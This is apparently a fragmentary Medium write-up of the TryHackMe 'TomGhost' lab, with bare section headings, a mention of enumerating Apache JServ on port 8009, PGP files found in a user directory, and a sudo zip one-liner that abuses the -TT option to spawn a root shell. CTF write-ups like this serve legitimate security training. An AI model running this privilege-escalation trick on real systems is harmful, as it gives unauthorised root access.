TomGhost Write-Up : TryHackMe Walk-through

Initial Reconnaissance

Enumeration

Initial FootHold

Now enumerating port 8009. The application is using is Apache Jserv.

cd /home/merlin/
cat user.txt

Privilege Escalation

We can see two files in /home/skyfuck directory.

credential.pgp
tryhackme.asc

What is a PGP File ?

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

Thank you for your patience and Happy Hacking!!!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store